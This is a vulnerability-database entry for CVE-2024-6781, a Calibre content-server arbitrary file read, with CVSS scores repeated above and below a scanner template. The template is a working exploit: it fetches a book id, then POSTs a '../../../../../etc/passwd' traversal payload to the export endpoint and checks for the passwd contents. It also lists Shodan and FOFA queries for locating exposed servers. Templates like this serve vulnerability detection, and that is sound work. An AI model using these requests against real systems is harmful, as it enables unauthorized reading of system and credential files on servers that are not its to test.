CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
72.6%
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
id: CVE-2024-6781
info:
name: Calibre <= 7.14.0 Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
metadata:
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
verified: true
max-requeset: 1
tags: cve,cve2024,calibre,lfi
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/export HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and
matchers:
- type: word
part: content_type
words:
- "application/json"
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- '"result":'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
72.6%